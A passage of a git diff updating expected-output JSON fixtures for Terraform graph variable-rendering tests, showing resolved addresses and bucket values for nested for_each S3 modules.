\"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" - ], - "__start_line__": 7, - "bucket2": [ - "var.bucket2" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module[\"b\"].inner_s3_module2[\"f\"]" - } - } - ], - "variable": [ - { - "bucket": { - "__end_line__": 16, - "__start_line__": 14, - "type": [ - "string" - ], - "__address__": "module.s3_module[\"b\"].bucket" - } - }, - { - "bucket2": { - "__end_line__": 20, - "__start_line__": 18, - "type": [ - "string" - ], - "__address__": "module.s3_module[\"b\"].bucket2" - } - } - ] - }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"d\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"c\"].bucket2" + false + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": 
"module.s3_module[\"a\"].module.inner_s3_module[\"d\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true @@ -608,15 +677,14 @@ true ], "bucket": [ - "var.bucket2" + false ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"c\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } 
@@ -624,30 +692,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"d\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"c\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"d\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"e\"].bucket2" + false + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"d\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true 
@@ -656,15 +726,14 @@ true ], "bucket": [ - "var.bucket2" + false ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"e\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } 
@@ -672,120 +741,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"d\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"e\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}": { - "module": [ - { - "inner_s3_module[\"c\"]": { - "__end_line__": 5, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" - ], - "__start_line__": 1, - "bucket2": [ - "var.bucket" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module2[1].inner_s3_module[\"c\"]" - } - }, - { - "inner_s3_module2[\"e\"]": { - "__end_line__": 11, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": 
null}}}" - ], - "__start_line__": 7, - "bucket2": [ - "var.bucket2" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module2[1].inner_s3_module2[\"e\"]" - } - }, - { - "inner_s3_module[\"d\"]": { - "__end_line__": 5, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" - ], - "__start_line__": 1, - "bucket2": [ - "var.bucket" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module2[1].inner_s3_module[\"d\"]" - } - }, - { - "inner_s3_module2[\"f\"]": { - "__end_line__": 11, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" - ], - "__start_line__": 7, - "bucket2": [ - "var.bucket2" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module2[1].inner_s3_module2[\"f\"]" - } - } - ], - "variable": [ - { - "bucket": { - "__end_line__": 16, - "__start_line__": 14, - "type": [ - "string" - ], - "__address__": "module.s3_module2[1].bucket" - } - }, - { - "bucket2": { - "__end_line__": 20, - "__start_line__": 18, - "type": [ - "string" - ], - "__address__": 
"module.s3_module2[1].bucket2" - } - } - ] - }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module2[0].module.inner_s3_module[\"d\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module2[1].module.inner_s3_module[\"c\"].bucket2" + "" + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module2[0].module.inner_s3_module[\"d\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true @@ -794,15 +775,14 @@ true ], "bucket": [ - "var.bucket2" + "" ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module2[1].module.inner_s3_module[\"c\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } 
@@ -810,30 +790,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module2[0].module.inner_s3_module[\"d\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module2[1].module.inner_s3_module[\"c\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module2[1].module.inner_s3_module[\"d\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module2[1].module.inner_s3_module2[\"e\"].bucket2" + "" + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module2[1].module.inner_s3_module[\"d\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true 
@@ -842,15 +824,14 @@
 true
 ],
 "bucket": [
- "var.bucket2"
+ ""
 ],
 "ignore_public_acls": [
 true
 ],
 "restrict_public_buckets": [
 true
- ],
- "__address__": "module.s3_module2[1].module.inner_s3_module2[\"e\"].aws_s3_bucket_public_access_block.var_bucket"
+ ]
 }
 }
 }
@@ -858,30 +839,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module2[1].module.inner_s3_module[\"d\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module2[1].module.inner_s3_module2[\"e\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"e\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"d\"].bucket2" + "" + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"e\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true 
@@ -890,15 +873,14 @@
 true
 ],
 "bucket": [
- "var.bucket2"
+ ""
 ],
 "ignore_public_acls": [
 true
 ],
 "restrict_public_buckets": [
 true
- ],
- "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"d\"].aws_s3_bucket_public_access_block.var_bucket"
+ ]
 }
 }
 }
@@ -906,30 +888,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"e\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"d\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"f\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"e\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"f\"].bucket2" + "" + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"e\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true 
@@ -938,15 +922,14 @@
 true
 ],
 "bucket": [
- "var.bucket2"
+ ""
 ],
 "ignore_public_acls": [
 true
 ],
 "restrict_public_buckets": [
 true
- ],
- "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"f\"].aws_s3_bucket_public_access_block.var_bucket"
+ ]
 }
 }
 }
@@ -954,30 +937,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"e\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"f\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module2[0].module.inner_s3_module2[\"e\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module2[0].module.inner_s3_module[\"d\"].bucket2" + true + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module2[0].module.inner_s3_module2[\"e\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true 
@@ -986,15 +971,14 @@
 true
 ],
 "bucket": [
- "var.bucket2"
+ true
 ],
 "ignore_public_acls": [
 true
 ],
 "restrict_public_buckets": [
 true
- ],
- "__address__": "module.s3_module2[0].module.inner_s3_module[\"d\"].aws_s3_bucket_public_access_block.var_bucket"
+ ]
 }
 }
 }
@@ -1002,30 +986,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module2[0].module.inner_s3_module2[\"e\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module2[0].module.inner_s3_module[\"d\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"f\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module2[1].module.inner_s3_module2[\"e\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module2[0].module.inner_s3_module2[\"f\"].bucket2" + true + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module2[1].module.inner_s3_module2[\"e\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true 
@@ -1034,15 +1020,14 @@
 true
 ],
 "bucket": [
- "var.bucket2"
+ true
 ],
 "ignore_public_acls": [
 true
 ],
 "restrict_public_buckets": [
 true
- ],
- "__address__": "module.s3_module2[0].module.inner_s3_module2[\"f\"].aws_s3_bucket_public_access_block.var_bucket"
+ ]
 }
 }
 }
@@ -1050,30 +1035,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module2[1].module.inner_s3_module2[\"e\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module2[0].module.inner_s3_module2[\"f\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"f\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"f\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"d\"].bucket2" + "" + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"f\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true 
@@ -1082,15 +1069,14 @@ true ], "bucket": [ - "var.bucket2" + "" ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"d\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } @@ -1098,12 +1084,12 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"f\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"d\"].bucket2" + ] } } ] @@ -1111,17 +1097,19 @@ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"f\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"f\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"f\"].bucket2" + "" + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"f\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true @@ -1130,15 +1118,14 @@ true ], "bucket": [ - "var.bucket2" + "" ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"f\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } 
@@ -1146,30 +1133,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"f\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module[\"b\"].module.inner_s3_module2[\"f\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"f\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module2[0].module.inner_s3_module2[\"f\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module2[1].module.inner_s3_module[\"d\"].bucket2" + true + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module2[0].module.inner_s3_module2[\"f\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true 
@@ -1178,15 +1167,14 @@ true ], "bucket": [ - "var.bucket2" + true ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module2[1].module.inner_s3_module[\"d\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } @@ -1194,12 +1182,12 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module2[0].module.inner_s3_module2[\"f\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module2[1].module.inner_s3_module[\"d\"].bucket2" + ] } } ] @@ -1207,17 +1195,19 @@ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"f\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module2[1].module.inner_s3_module2[\"f\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module2[1].module.inner_s3_module2[\"f\"].bucket2" + true + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module2[1].module.inner_s3_module2[\"f\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true @@ -1226,15 +1216,14 @@ true ], "bucket": [ - "var.bucket2" + true ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module2[1].module.inner_s3_module2[\"f\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } 
@@ -1242,12 +1231,39 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module2[1].module.inner_s3_module2[\"f\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module2[1].module.inner_s3_module2[\"f\"].bucket2" + ] + } + } + ] + }, + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/variable.tf\", \"tf_source_modules\": null}": { + "variable": [ + { + "count_var": { + "__address__": "count_var", + "__end_line__": 4, + "__start_line__": 2, + "default": [ + 2 + ] + } + }, + { + "foreach_var": { + "__address__": "foreach_var", + "__end_line__": 8, + "__start_line__": 6, + "default": [ + [ + "a", + "b" + ] + ] } } ] diff --git a/tests/terraform/graph/variable_rendering/expected_foreach_modules_tf_definitions.json b/tests/terraform/graph/variable_rendering/expected_foreach_modules_tf_definitions.json index d8a6f2fa138..20e29ce8752 100644 --- a/tests/terraform/graph/variable_rendering/expected_foreach_modules_tf_definitions.json +++ b/tests/terraform/graph/variable_rendering/expected_foreach_modules_tf_definitions.json @@ -107,7 +107,7 @@ ], "__start_line__": 1, "bucket2": [ - "var.bucket" + false ], "source": [ "./module2" @@ -123,7 +123,7 @@ ], "__start_line__": 6, "bucket2": [ - "var.bucket2" + "" ], "source": [ "./module2" 
